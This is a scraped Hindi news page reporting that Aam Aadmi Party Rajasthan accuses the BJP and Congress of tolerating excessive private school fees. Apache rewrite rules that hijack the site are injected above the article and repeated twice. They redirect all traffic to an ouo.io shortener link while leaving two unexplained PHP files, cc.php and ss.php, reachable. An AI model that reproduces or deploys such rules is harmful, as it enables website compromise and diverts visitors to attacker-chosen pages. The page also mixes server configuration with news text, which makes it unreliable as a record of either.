
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 588
Previousजयपुर। आम आदमी पार्टी ने राजस्थान में निजी स्कूलों की मनमानी पर लगाम लगाने की प्रदेश सरकार से मांग की है। आम आदमी पार्टी राजस्थान इकाई ने विधानसभा में उठे सवालों पर हुई बहस पर कड़ी निंदा करते हुए कहा है कि भाजपा और कांग्रेस निजी स्कूलों पर अंकुश के मामले में सदन में केवल दिखावा कर रही है और इस पर उठ रहे सवालों का सरकार गोलमोल जवाब देकर सदन और अभिभावकों का अपमान कर रही है। आप ने कहा है कि भाजपा सरकार की मिलीभगत के बिना निजी स्कूल जनता की खून-पसीने की कमाई को लूट नहीं सकते और कांग्रेस प्रमुख विपक्षी दल होते हुए निजी स्कूलों की खुली लूट पर औपचारिकता भर बयान देकर इस लूट पर मौन सहमति दे रही है। पार्टी के समन्वयक अशोक जैन मांगरोल ने कहा है कि प्राइवेट स्कूलों की मोटी कमाई का बड़ा हिस्सा प्रत्यक्ष-अप्रत्यक्ष तौर पर नेताओं की जेब में जा रहा होता है, जिससे दिखावे के लिए भाजपा व कांग्रेस आपस में नूरा-कुश्ती करते हैं किंतु वास्तव में इस हो-हल्ला का कोई वास्तविक लाभ जनता को कभी नहीं मिल पाता। आम आदमी पार्टी राज्य की वसुंधरा सरकार से मांग करती है कि वह दिल्ली की ‘ आप ’ सरकार के तर्ज पर शिक्षा का बजट कुल बजट का 25 फीसदी रखकर राजस्थान के छात्रों का भविष्य संवारने के प्रति गंभीरता दिखाएं, जिससे कि सरकारी स्कूलों की दशा में वास्तविक सुधार कर यहां शिक्षा के बुनियादी ढ़ाचे में वास्तविक सुधार हो सके, क्योंकि इससे प्राइवेट स्कूलों की मनमानी पर पूरी तरह अंकुश संभव हो सकेगा, ऐसा दिल्ली को आप सरकार ने पिछले तीन वर्षो में दिल्ली में कर के दिखाया है जिसका लोह आज पूरा विश्व मानता है।